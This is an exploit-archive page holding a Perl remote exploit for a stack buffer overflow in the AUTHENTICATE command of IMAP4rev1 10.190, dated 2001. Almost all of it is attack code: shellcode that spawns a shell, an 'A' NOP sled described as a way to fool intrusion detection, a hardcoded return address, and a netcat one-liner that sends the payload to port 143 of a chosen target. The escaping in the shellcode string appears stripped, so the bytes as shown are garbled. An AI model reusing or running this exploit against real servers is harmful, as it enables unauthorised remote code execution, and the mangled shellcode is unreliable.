[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : IMAP4rev1 10.190 Authentication Stack Overflow Exploit
# Published : 2001-01-19
# Author : teleh0r
# Previous Title : Netscape Enterprise Server 4.0/sparc/SunOS 5.7 Remote Exploit
# Next Title : Cisco Password Bruteforcer Exploit
#!/usr/bin/perl
## * Successfully tested on IMAP4rev1 v10.190 *
## Written by: teleh0r@doglover.com / anno 2000
##
## This is nothing new - just wrote it for fun.
$shellcode = "xebx35x5ex80x46x01x30x80x46x02x30x80".
"x46x03x30x80x46x05x30x80x46x06x30x89".
"xf0x89x46x08x31xc0x88x46x07x89x46x0c".
"xb0x0bx89xf3x8dx4ex08x8dx56x0cxcdx80".
"x31xdbx89xd8x40xcdx80xe8xc6xffxffxff".
"x2fx32x39x3ex2fx43x38";
$len = 1052; # Sufficient to overwrite the return value.
$nop = A; # Using A/0x41 as nops to try to fool IDS.
$ret = 0xbffff30f; # Return Value / ESP / Stack Pointer.
if (@ARGV < 2) {
print("Usage: $0 <target> <offset>n");
exit(1);
}
($target, $offset) = @ARGV;
for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
$buffer .= $nop;
}
$buffer .= $shellcode;
$new_ret = pack('l', ($ret + $offset));
for ($i += length($shellcode); $i < $len; $i += 4) {
$buffer .= $new_ret;
}
$exploit_string = "* AUTHENTICATE {$len} 15 12$buffer 12";
system("(echo -e "$exploit_string" ; cat) | nc $target 143");
# www.Syue.com [2001-01-19]